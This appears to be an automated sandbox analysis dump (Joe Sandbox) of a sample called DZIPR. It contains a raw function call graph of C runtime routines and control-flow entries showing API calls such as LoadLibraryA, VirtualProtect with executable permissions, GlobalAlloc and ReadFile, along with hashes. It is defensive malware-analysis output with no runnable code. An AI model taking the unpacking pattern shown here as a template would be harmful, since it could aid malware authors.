6c530370 17226->17228 17229 6c532365 ___free_lc_time 67 API calls 17227->17229 17239 6c5303c3 17227->17239 17232 6c524618 __setenvp 67 API calls 17228->17232 17231 6c5303bc 17229->17231 17233 6c530337 17230->17233 17243 6c524618 
__setenvp 67 API calls 17230->17243 17234 6c524618 __setenvp 67 API calls 17231->17234 17237 6c530383 17232->17237 17238 6c524618 __setenvp 67 API calls 17233->17238 17234->17239 17240 6c53030b 17235->17240 17236 6c530408 17241 6c524618 __setenvp 67 API calls 17236->17241 17242 6c524618 __setenvp 67 API calls 17237->17242 17244 6c530344 17238->17244 17239->17236 17249 6c524618 67 API calls __setenvp 17239->17249 17245 6c53253f ___free_lconv_mon 67 API calls 17240->17245 17246 6c53040e 17241->17246 17247 6c530391 17242->17247 17248 6c53032c 17243->17248 17250 6c524618 __setenvp 67 API calls 17244->17250 17245->17230 17246->17188 17251 6c524618 __setenvp 67 API calls 17247->17251 17252 6c5324fa ___free_lconv_num 67 API calls 17248->17252 17249->17239 17250->17225 17251->17227 17252->17233 17253->17196 17257 6c52a83a RtlLeaveCriticalSection 17254->17257 17256 6c52feb0 17256->17174 17257->17256 17259 6c53011f ___lock_fhandle 17258->17259 17260 6c52a27f __getptd 67 API calls 17259->17260 17261 6c530128 17260->17261 17262 6c52fe0e _LocaleUpdate::_LocaleUpdate 69 API calls 17261->17262 17263 6c530132 17262->17263 17289 6c52feb2 17263->17289 17266 6c52a5c3 __malloc_crt 67 API calls 17267 6c530153 17266->17267 17279 6c530272 ___lock_fhandle 17267->17279 17296 6c52ff2e 17267->17296 17270 6c530183 InterlockedDecrement 17272 6c530193 17270->17272 17273 6c5301a4 InterlockedIncrement 17270->17273 17271 6c53027f 17275 6c530292 17271->17275 17278 6c524618 __setenvp 67 API calls 17271->17278 17271->17279 17272->17273 17277 6c524618 __setenvp 67 API calls 17272->17277 17274 6c5301ba 17273->17274 17273->17279 17274->17279 17281 6c52a914 __lock 67 API calls 17274->17281 17276 6c525348 __cftof2_l 67 API calls 17275->17276 17276->17279 17280 6c5301a3 17277->17280 17278->17275 17279->17139 17280->17273 17283 6c5301ce InterlockedDecrement 17281->17283 17284 6c53024a 17283->17284 17285 6c53025d InterlockedIncrement 17283->17285 17284->17285 17287 6c524618 __setenvp 67 API calls 
17284->17287 17306 6c530274 17285->17306 17288 6c53025c 17287->17288 17288->17285 17290 6c528659 _LocaleUpdate::_LocaleUpdate 77 API calls 17289->17290 17291 6c52fec6 17290->17291 17292 6c52fed1 GetOEMCP 17291->17292 17293 6c52feef 17291->17293 17295 6c52fee1 17292->17295 17294 6c52fef4 GetACP 17293->17294 17293->17295 17294->17295 17295->17266 17295->17279 17297 6c52feb2 getSystemCP 79 API calls 17296->17297 17298 6c52ff4e 17297->17298 17299 6c52ff59 setSBCS 17298->17299 17301 6c52ff9d IsValidCodePage 17298->17301 17305 6c52ffc2 _memset __setmbcp_nolock 17298->17305 17300 6c523f34 _$I10_OUTPUT 5 API calls 17299->17300 17302 6c530111 17300->17302 17301->17299 17303 6c52ffaf GetCPInfo 17301->17303 17302->17270 17302->17271 17303->17299 17303->17305 17309 6c52fc7b GetCPInfo 17305->17309 17435 6c52a83a RtlLeaveCriticalSection 17306->17435 17308 6c53027b 17308->17279 17310 6c52fd61 17309->17310 17315 6c52fcaf _memset 17309->17315 17314 6c523f34 _$I10_OUTPUT 5 API calls 17310->17314 17317 6c52fe0c 17314->17317 17319 6c532323 17315->17319 17317->17305 17318 6c532124 ___crtLCMapStringA 102 API calls 17318->17310 17320 6c528659 _LocaleUpdate::_LocaleUpdate 77 API calls 17319->17320 17321 6c532336 17320->17321 17329 6c532169 17321->17329 17324 6c532124 17325 6c528659 _LocaleUpdate::_LocaleUpdate 77 API calls 17324->17325 17326 6c532137 17325->17326 17388 6c531d7f 17326->17388 17330 6c5321b5 17329->17330 17331 6c53218a GetStringTypeW 17329->17331 17332 6c5321a2 17330->17332 17334 6c53229c 17330->17334 17331->17332 17333 6c5321aa GetLastError 17331->17333 17335 6c5321ee MultiByteToWideChar 17332->17335 17343 6c532296 17332->17343 17333->17330 17357 6c534dbc GetLocaleInfoA 17334->17357 17337 6c53221b 17335->17337 17335->17343 17344 6c5249fe _malloc 67 API calls 17337->17344 17352 6c532230 _memset ___convertcp 17337->17352 17338 6c523f34 _$I10_OUTPUT 5 API calls 17339 6c52fd1c 17338->17339 17339->17324 17341 6c5322ed GetStringTypeA 17342 6c532308 17341->17342 17341->17343 17347 
6c524618 __setenvp 67 API calls 17342->17347 17343->17338 17344->17352 17346 6c532269 MultiByteToWideChar 17349 6c532290 17346->17349 17350 6c53227f GetStringTypeW 17346->17350 17347->17343 17353 6c531006 17349->17353 17350->17349 17352->17343 17352->17346 17354 6c531012 17353->17354 17355 6c531023 17353->17355 17354->17355 17356 6c524618 __setenvp 67 API calls 17354->17356 17355->17343 17356->17355 17358 6c534dea 17357->17358 17359 6c534def 17357->17359 17361 6c523f34 _$I10_OUTPUT 5 API calls 17358->17361 17360 6c531026 ___ansicp 90 API calls 17359->17360 17360->17358 17362 6c5322c0 17361->17362 17362->17341 17362->17343 17363 6c534e05 17362->17363 17364 6c534e45 GetCPInfo 17363->17364 17369 6c534ecf 17363->17369 17365 6c534eba MultiByteToWideChar 17364->17365 17366 6c534e5c 17364->17366 17365->17369 17372 6c534e75 _strlen 17365->17372 17366->17365 17367 6c534e62 GetCPInfo 17366->17367 17367->17365 17370 6c534e6f 17367->17370 17368 6c523f34 _$I10_OUTPUT 5 API calls 17371 6c5322e1 17368->17371 17369->17368 17370->17365 17370->17372 17371->17341 17371->17343 17373 6c5249fe _malloc 67 API calls 17372->17373 17374 6c534ea7 _memset ___convertcp 17372->17374 17373->17374 17374->17369 17375 6c534f04 MultiByteToWideChar 17374->17375 17376 6c534f1c 17375->17376 17380 6c534f3b 17375->17380 17378 6c534f23 WideCharToMultiByte 17376->17378 17379 6c534f40 17376->17379 17377 6c531006 __freea 67 API calls 17377->17369 17378->17380 17381 6c534f4b WideCharToMultiByte 17379->17381 17382 6c534f5f 17379->17382 17380->17377 17381->17380 17381->17382 17383 6c52a608 __calloc_crt 67 API calls 17382->17383 17384 6c534f67 17383->17384 17384->17380 17385 6c534f70 WideCharToMultiByte 17384->17385 17385->17380 17386 6c534f82 17385->17386 17387 6c524618 __setenvp 67 API calls 17386->17387 17387->17380 17389 6c531da0 LCMapStringW 17388->17389 17392 6c531dbb 17388->17392 17390 6c531dc3 GetLastError 17389->17390 17389->17392 17390->17392 17391 6c531fb9 17394 6c534dbc ___ansicp 91 API calls 
17391->17394 17392->17391 17393 6c531e15 17392->17393 17395 6c531e2e MultiByteToWideChar 17393->17395 17418 6c531fb0 17393->17418 17397 6c531fe1 17394->17397 17402 6c531e5b 17395->17402 17395->17418 17396 6c523f34 _$I10_OUTPUT 5 API calls 17398 6c52fd3c 17396->17398 17399 6c5320d5 LCMapStringA 17397->17399 17400 6c531ffa 17397->17400 17397->17418 17398->17318 17434 6c532031 17399->17434 17403 6c534e05 ___convertcp 74 API calls 17400->17403 17401 6c531eac MultiByteToWideChar 17404 6c531ec5 LCMapStringW 17401->17404 17428 6c531fa7 17401->17428 17406 6c5249fe _malloc 67 API calls 17402->17406 17414 6c531e74 ___convertcp 17402->17414 17407 6c53200c 17403->17407 17408 6c531ee6 17404->17408 17404->17428 17405 6c5320fc 17416 6c524618 __setenvp 67 API calls 17405->17416 17405->17418 17406->17414 17410 6c532016 LCMapStringA 17407->17410 17407->17418 17412 6c531f18 17408->17412 17413 6c531eef 17408->17413 17409 6c524618 __setenvp 67 API calls 17409->17405 17415 6c532038 17410->17415 17410->17434 17411 6c531006 __freea 67 API calls 17411->17418 17423 6c5249fe _malloc 67 API calls 17412->17423 17429 6c531f33 ___convertcp 17412->17429 17417 6c531f01 LCMapStringW 17413->17417 17413->17428 17414->17401 17414->17418 17420 6c5249fe _malloc 67 API calls 17415->17420 17424 6c532049 _memset ___convertcp 17415->17424 17416->17418 17417->17428 17418->17396 17419 6c531f67 LCMapStringW 17421 6c531fa1 17419->17421 17422 6c531f7f WideCharToMultiByte 17419->17422 17420->17424 17425 6c531006 __freea 67 API calls 17421->17425 17422->17421 17423->17429 17426 6c532087 LCMapStringA 17424->17426 17424->17434 17425->17428 17430 6c5320a3 17426->17430 17431 6c5320a7 17426->17431 17428->17411 17429->17419 17429->17428 17433 6c531006 __freea 67 API calls 17430->17433 17432 6c534e05 ___convertcp 74 API calls 17431->17432 17432->17430 17433->17434 17434->17405 17434->17409 17435->17308 17437 6c52df88 17436->17437 17438 6c529fb8 __encode_pointer 6 API calls 17437->17438 17439 6c52dfa0 17437->17439 
17438->17437 17439->17073 17443 6c524478 17440->17443 17442 6c5244c1 17442->17075 17444 6c524484 ___lock_fhandle 17443->17444 17451 6c525c6b 17444->17451 17450 6c5244a5 ___lock_fhandle 17450->17442 17452 6c52a914 __lock 67 API calls 17451->17452 17453 6c524489 17452->17453 17454 6c52438d 17453->17454 17455 6c52a033 __decode_pointer 6 API calls 17454->17455 17456 6c5243a1 17455->17456 17457 6c52a033 __decode_pointer 6 API calls 17456->17457 17458 6c5243b1 17457->17458 17459 6c527637 __msize 68 API calls 17458->17459 17469 6c524434 17458->17469 17460 6c5243cf 17459->17460 17461 6c52441b 17460->17461 17463 6c5243ea 17460->17463 17464 6c5243f9 17460->17464 17462 6c529fb8 __encode_pointer 6 API calls 17461->17462 17465 6c524429 17462->17465 17477 6c52a654 17463->17477 17468 6c5243f3 17464->17468 17464->17469 17466 6c529fb8 __encode_pointer 6 API calls 17465->17466 17466->17469 17468->17464 17470 6c52a654 __realloc_crt 73 API calls 17468->17470 17471 6c52440f 17468->17471 17474 6c5244ae 17469->17474 17472 6c524409 17470->17472 17473 6c529fb8 __encode_pointer 6 API calls 17471->17473 17472->17469 17472->17471 17473->17461 17482 6c525c74 17474->17482 17479 6c52a65d 17477->17479 17478 6c524ac8 _realloc 72 API calls 17478->17479 17479->17478 17480 6c52a69c 17479->17480 17481 6c52a67d Sleep 17479->17481 17480->17468 17481->17479 17485 6c52a83a RtlLeaveCriticalSection 17482->17485 17484 6c5244b3 17484->17450 17485->17484 17487 6c525d4f ___lock_fhandle 17486->17487 17488 6c52a914 __lock 67 API calls 17487->17488 17489 6c525d56 17488->17489 17491 6c52a033 __decode_pointer 6 API calls 17489->17491 17492 6c525e0f __initterm 17489->17492 17493 6c525d8d 17491->17493 17503 6c525e5a 17492->17503 17493->17492 17497 6c52a033 __decode_pointer 6 API calls 17493->17497 17495 6c525e57 ___lock_fhandle 17495->17100 17502 6c525da2 17497->17502 17498 6c525e4e 17499 6c525c53 _malloc 3 API calls 17498->17499 17499->17495 17500 6c52a02a 6 API calls _raise 17500->17502 17501 6c52a033 6 API calls 
__decode_pointer 17501->17502 17502->17492 17502->17500 17502->17501 17504 6c525e60 17503->17504 17505 6c525e3b 17503->17505 17508 6c52a83a RtlLeaveCriticalSection 17504->17508 17505->17495 17507 6c52a83a RtlLeaveCriticalSection 17505->17507 17507->17498 17508->17505 17510 6c52a2a5 ___lock_fhandle 17509->17510 17511 6c52a2bd 17510->17511 17513 6c52a3a7 ___lock_fhandle 17510->17513 17514 6c524618 __setenvp 67 API calls 17510->17514 17512 6c52a2cb 17511->17512 17515 6c524618 __setenvp 67 API calls 17511->17515 17516 6c52a2d9 17512->17516 17517 6c524618 __setenvp 67 API calls 17512->17517 17513->17102 17514->17511 17515->17512 17518 6c52a2e7 17516->17518 17519 6c524618 __setenvp 67 API calls 17516->17519 17517->17516 17520 6c52a2f5 17518->17520 17522 6c524618 __setenvp 67 API calls 17518->17522 17519->17518 17521 6c52a303 17520->17521 17523 6c524618 __setenvp 67 API calls 17520->17523 17524 6c52a311 17521->17524 17525 6c524618 __setenvp 67 API calls 17521->17525 17522->17520 17523->17521 17526 6c52a322 17524->17526 17527 6c524618 __setenvp 67 API calls 17524->17527 17525->17524 17528 6c52a914 __lock 67 API calls 17526->17528 17527->17526 17529 6c52a32a 17528->17529 17530 6c52a336 InterlockedDecrement 17529->17530 17536 6c52a34f 17529->17536 17532 6c52a341 17530->17532 17530->17536 17534 6c524618 __setenvp 67 API calls 17532->17534 17532->17536 17534->17536 17535 6c52a914 __lock 67 API calls 17537 6c52a363 17535->17537 17545 6c52a3b3 17536->17545 17538 6c52a394 17537->17538 17540 6c5304a3 ___removelocaleref 8 API calls 17537->17540 17548 6c52a3bf 17538->17548 17543 6c52a378 17540->17543 17542 6c524618 __setenvp 67 API calls 17542->17513 17543->17538 17544 6c5302cb ___freetlocinfo 67 API calls 17543->17544 17544->17538 17551 6c52a83a RtlLeaveCriticalSection 17545->17551 17547 6c52a35c 17547->17535 17552 6c52a83a RtlLeaveCriticalSection 17548->17552 17550 6c52a3a1 17550->17542 17551->17547 17552->17550 15856 6c5139b0 15899 6c517268 15856->15899 15861 6c517268 70 API 
calls 15863 6c513a19 15861->15863 15862 6c513a40 15908 6c512370 15862->15908 15863->15862 15864 6c511690 ctype 70 API calls 15863->15864 15864->15862 15866 6c513a69 15867 6c511690 ctype 70 API calls 15866->15867 15868 6c513a87 15866->15868 15867->15868 15941 6c511a10 15868->15941 15870 6c513b12 15871 6c513b77 15870->15871 15872 6c513b16 15870->15872 15873 6c513b81 15871->15873 15874 6c513c3b 15871->15874 15914 6c511000 15872->15914 15984 6c513090 15873->15984 16020 6c512c10 15874->16020 15879 6c513b8c 15993 6c5131f0 15879->15993 15880 6c513c49 16032 6c5115f0 15880->16032 15888 6c513b4c 15973 6c5112c0 15888->15973 15893 6c513b65 16041 6c515590 15893->16041 16059 6c511700 15899->16059 15902 6c511990 15903 6c5119b4 15902->15903 15904 6c5168e2 ctype 67 API calls 15903->15904 15905 6c5119be 15904->15905 15906 6c5168e2 ctype 67 API calls 15905->15906 15907 6c5119e7 15906->15907 15907->15861 15909 6c51239f ctype 15908->15909 15910 6c511690 ctype 70 API calls 15909->15910 15911 6c5123c2 15909->15911 15910->15911 16063 6c5114a0 15911->16063 15913 6c51240f 15913->15866 15915 6c51102d 15914->15915 15916 6c511042 15915->15916 15917 6c511690 ctype 70 API calls 15915->15917 15918 6c5131f0 105 API calls 15916->15918 15917->15916 15919 6c511068 15918->15919 15920 6c5115f0 70 API calls 15919->15920 15921 6c511077 15920->15921 15922 6c513e60 15921->15922 16118 6c523d6c 15922->16118 15924 6c514443 15925 6c5168e2 ctype 67 API calls 15924->15925 15927 6c514460 ctype 15925->15927 15926 6c513b35 15950 6c515070 15926->15950 15928 6c52527b __CxxThrowException@8 RaiseException 15927->15928 15929 6c5144ae 15928->15929 15930 6c516dc1 ctype 2 API calls 15929->15930 15930->15926 15931 6c5168e2 ctype 67 API calls 15937 6c513ea7 _memset 15931->15937 15936 6c51afc3 69 API calls 15936->15937 15937->15924 15937->15926 15937->15929 15937->15931 15937->15936 15940 6c5140fd 15937->15940 16128 6c515ca0 15937->16128 16141 6c516160 15937->16141 16146 6c51b1ec 15937->16146 15939 6c516750 ReadFile 
15939->15940 15940->15937 15940->15939 16152 6c515e70 15940->16152 16158 6c5163f0 15940->16158 16186 6c51764f 15941->16186 15943 6c511a59 15944 6c511690 ctype 70 API calls 15943->15944 15945 6c511a7d 15943->15945 15949 6c511af7 15943->15949 15944->15945 16202 6c5172fd 15945->16202 15949->15870 15971 6c5150a6 15950->15971 15951 6c5153de 15952 6c516dc1 ctype 2 API calls 15951->15952 15954 6c5153e3 15952->15954 15953 6c5152bf 16344 6c5147d0 15953->16344 15957 6c5168e2 ctype 67 API calls 15954->15957 15955 6c51538f 15958 6c5168e2 ctype 67 API calls 15955->15958 15963 6c5153ea ctype 15957->15963 15965 6c515396 ctype 15958->15965 15959 6c51525a 15959->15951 15959->15953 15959->15954 16340 6c5145f0 15959->16340 15964 6c52527b __CxxThrowException@8 RaiseException 15963->15964 15967 6c515432 15964->15967 15966 6c52527b __CxxThrowException@8 RaiseException 15965->15966 15966->15951 15968 6c51530c 15968->15888 15969 6c5131f0 105 API calls 15969->15971 15970 6c512600 104 API calls 15970->15971 15971->15951 15971->15955 15971->15959 15971->15969 15971->15970 16289 6c514880 15971->16289 16311 6c514ac0 15971->16311 16334 6c515490 15971->16334 15974 6c5112d1 15973->15974 15975 6c5112ea 15973->15975 15974->15975 15976 6c511690 ctype 70 API calls 15974->15976 15977 6c517202 15975->15977 15976->15975 15978 6c517220 15977->15978 15979 6c517212 CloseHandle 15977->15979 15980 6c5112c0 ctype 70 API calls 15978->15980 15979->15978 15981 6c517232 15980->15981 15982 6c517244 ctype 15981->15982 15983 6c517236 GetLastError 15981->15983 15982->15893 15983->15982 16532 6c512f60 15984->16532 15986 6c51309f 15987 6c5130a7 15986->15987 15988 6c5130bc 15986->15988 16548 6c513370 15987->16548 16556 6c511580 15988->16556 15991 6c5130b8 15991->15879 15992 6c5130c7 15992->15879 15994 6c513222 15993->15994 15995 6c513237 15994->15995 15996 6c511690 ctype 70 API calls 15994->15996 15997 6c51aef1 ctype 100 API calls 15995->15997 15996->15995 15998 6c513254 15997->15998 16572 6c5133f0 FindResourceExW 
15998->16572 16000 6c513268 16001 6c51326c 16000->16001 16002 6c51aef1 ctype 100 API calls 16000->16002 16003 6c511580 70 API calls 16001->16003 16004 6c5132bf 16002->16004 16012 6c513279 16003->16012 16005 6c5133f0 74 API calls 16004->16005 16006 6c5132d3 16005->16006 16007 6c5132d7 16006->16007 16008 6c513308 16006->16008 16009 6c511580 70 API calls 16007->16009 16010 6c51a58c 100 API calls 16008->16010 16009->16012 16011 6c51330e 16010->16011 16013 6c513325 16011->16013 16015 6c512a10 104 API calls 16011->16015 16017 6c512600 16012->16017 16014 6c512b50 104 API calls 16013->16014 16014->16012 16016 6c51331d 16015->16016 16016->16001 16016->16013 16599 6c511240 16017->16599 16021 6c512c51 16020->16021 16022 6c511690 ctype 70 API calls 16021->16022 16023 6c512c70 16021->16023 16022->16023 16024 6c5131f0 105 API calls 16023->16024 16030 6c512cc0 16023->16030 16026 6c512cad 16024->16026 16025 6c5131f0 105 API calls 16027 6c512cf9 16025->16027 16028 6c5244cb ctype 67 API calls 16026->16028 16029 6c512600 104 API calls 16027->16029 16028->16030 16031 6c512d0b moneypunct 16029->16031 16030->16025 16031->15880 16033 6c511606 16032->16033 16034 6c51165a 16032->16034 16035 6c511646 16033->16035 16037 6c511616 16033->16037 16034->15893 16036 6c5114a0 70 API calls 16035->16036 16038 6c511652 16036->16038 16039 6c511580 70 API calls 16037->16039 16038->15893 16040 6c51161d 16039->16040 16040->15893 16042 6c513d8b 16041->16042 16043 6c5155bb 16041->16043 16047 6c512490 16042->16047 16043->16042 16044 6c5131f0 105 API calls 16043->16044 16045 6c5155d1 16044->16045 16046 6c512600 104 API calls 16045->16046 16046->16042 16048 6c5124d1 16047->16048 16049 6c5124ed 16047->16049 16048->16049 16050 6c5112c0 ctype 70 API calls 16048->16050 16883 6c517343 16049->16883 16050->16049 16060 6c511708 16059->16060 16061 6c511716 16060->16061 16062 6c511690 ctype 70 API calls 16060->16062 16061->15902 16062->16061 16064 6c5114b6 16063->16064 16065 6c5114ac 16063->16065 16067 6c5114c9 
16064->16067 16069 6c511690 ctype 70 API calls 16064->16069 16066 6c5112c0 ctype 70 API calls 16065->16066 16068 6c5114b1 16066->16068 16070 6c5114ed 16067->16070 16080 6c5113f0 16067->16080 16068->15913 16069->16067 16072 6c51150a 16070->16072 16073 6c5114fd 16070->16073 16102 6c523f43 16072->16102 16090 6c523fc0 16073->16090 16076 6c511508 16077 6c511525 16076->16077 16078 6c511690 ctype 70 API calls 16076->16078 16077->15913 16079 6c511542 16078->16079 16081 6c511401 16080->16081 16082 6c511330 16081->16082 16083 6c5113b0 16081->16083 16084 6c511364 16082->16084 16111 6c511550 16082->16111 16085 6c511550 70 API calls 16083->16085 16088 6c5113de 16083->16088 16087 6c523f43 _memcpy_s 67 API calls 16084->16087 16085->16088 16089 6c51137d 16087->16089 16088->16070 16089->16070 16091 6c523fd0 16090->16091 16101 6c523fe9 16090->16101 16092 6c523fd5 16091->16092 16093 6c523ff5 16091->16093 16094 6c525348 __cftof2_l 67 API calls 16092->16094 16096 6c523ffa 16093->16096 16097 6c524008 16093->16097 16095 6c523fda 16094->16095 16100 6c52815c __cftof2_l 6 API calls 16095->16100 16098 6c525348 __cftof2_l 67 API calls 16096->16098 16114 6c528190 16097->16114 16098->16095 16100->16101 16101->16076 16105 6c523f53 ___crtGetEnvironmentStringsA 16102->16105 16106 6c523f57 _memset 16102->16106 16103 6c523f5c 16104 6c525348 __cftof2_l 67 API calls 16103->16104 16110 6c523f61 16104->16110 16105->16076 16106->16103 16106->16105 16108 6c523fa6 16106->16108 16107 6c52815c __cftof2_l 6 API calls 16107->16105 16108->16105 16109 6c525348 __cftof2_l 67 API calls 16108->16109 16109->16110 16110->16107 16112 6c511690 ctype 70 API calls 16111->16112 16113 6c51155a 16112->16113 16115 6c5281a8 16114->16115 16116 6c5281cf __VEC_memcpy 16115->16116 16117 6c5281d7 16115->16117 16116->16117 16117->16101 16122 6c523d7f 16118->16122 16119 6c516dc1 ctype 2 API calls 16119->16122 16120 6c523dad 16121 6c5168e2 ctype 67 API calls 16120->16121 16127 6c523d92 _memset moneypunct 16121->16127 16122->16119 

                                          Control-flow Graph

                                          APIs
                                          • LoadLibraryA.KERNELBASE(00000000), ref: 6C516602
                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6C51663B
                                          • VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6C516654
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$LibraryLoad
                                          • String ID:
                                          • API String ID: 895956442-0

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LibraryLoad_memset
                                          • String ID:
                                          • API String ID: 2997193564-0

                                          Control-flow Graph

                                          APIs
                                          • GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6C515ECA
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AllocGlobal
                                          • String ID:
                                          • API String ID: 3761449716-0
                                          • Opcode ID: a4a5709c9655045efaa4e4b912102b50090d554d3e30dadca7cedaaf9164bb4a
                                          • Instruction ID: a2cc0c8648c4cb1a74a4c2939a1b5652b01fa05ac37c0862bebf5fd43b341ec7
                                          • Opcode Fuzzy Hash: a4a5709c9655045efaa4e4b912102b50090d554d3e30dadca7cedaaf9164bb4a
                                          • Instruction Fuzzy Hash: 32A1B17060C3068FD708DF28C89422AB7E2FF89308F55896DE89687B56D730E861CB81

                                          Control-flow Graph

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(6C5432EC), ref: 6C51BC61
                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,6C5432D0,6C5432D0,?,6C51C0A4,00000004,6C51AF00,6C516DDD,6C5168AD,?,6C524902,?), ref: 6C51BCB7
                                          • GlobalHandle.KERNEL32(00FBB080), ref: 6C51BCC0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6C51BCCA
                                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6C51BCE3
                                          • GlobalHandle.KERNEL32(00FBB080), ref: 6C51BCF5
                                          • GlobalLock.KERNEL32(00000000), ref: 6C51BCFC
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C51BD05
                                          • GlobalLock.KERNEL32(00000000), ref: 6C51BD11
                                          • _memset.LIBCMT ref: 6C51BD2B
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C51BD59
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                          • String ID:
                                          • API String ID: 496899490-0
                                          • Opcode ID: f23622fa3079a2f2a1cff776b9965325b6a06531fbfba603b079b4229947a467
                                          • Instruction ID: e7dc77d7a79ac74e43806f5a4c2bd8df767f3654c0114ebe1df0b958ab7a5870
                                          • Opcode Fuzzy Hash: f23622fa3079a2f2a1cff776b9965325b6a06531fbfba603b079b4229947a467
                                          • Instruction Fuzzy Hash: 6131EFB1604701EFEB249F64CC8DA5A7BF9FF84304B05496AE556C7F00EB70E8448B94

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          • LoadLibraryA.KERNELBASE(00000000), ref: 6C516602
                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6C51663B
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LibraryLoadProtectVirtual
                                          • String ID:
                                          • API String ID: 3279857687-0
                                          • Opcode ID: 8d1c55a613902544d25a038340f4e633b3ba2d15ec23633fd952aa9acfe89f1e
                                          • Instruction ID: 2dc96c165b40467e619bf7679e74a4baface29b3869f308371fc06285ca641de
                                          • Opcode Fuzzy Hash: 8d1c55a613902544d25a038340f4e633b3ba2d15ec23633fd952aa9acfe89f1e
                                          • Instruction Fuzzy Hash: 2751D03060C3558FD715CF18C88062AFBE6EFC9308F1A896DE88587616DA30E946CB95

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6C53C168), ref: 6C516300
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 5be2214db39aeb1c5b0cb0ce8808323df14b9001f0a1adce16f3b801de6712fb
                                          • Instruction ID: 06bb4ec56e3c2f4679b3f3ef4ae770b1f5f09429bc4f3f805d4c83e49c214a0e
                                          • Opcode Fuzzy Hash: 5be2214db39aeb1c5b0cb0ce8808323df14b9001f0a1adce16f3b801de6712fb
                                          • Instruction Fuzzy Hash: 4941CF3160C7458FE708CF19CC9866AB7E2FBC4318F19C96DE88987B16DA31E8558B80

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
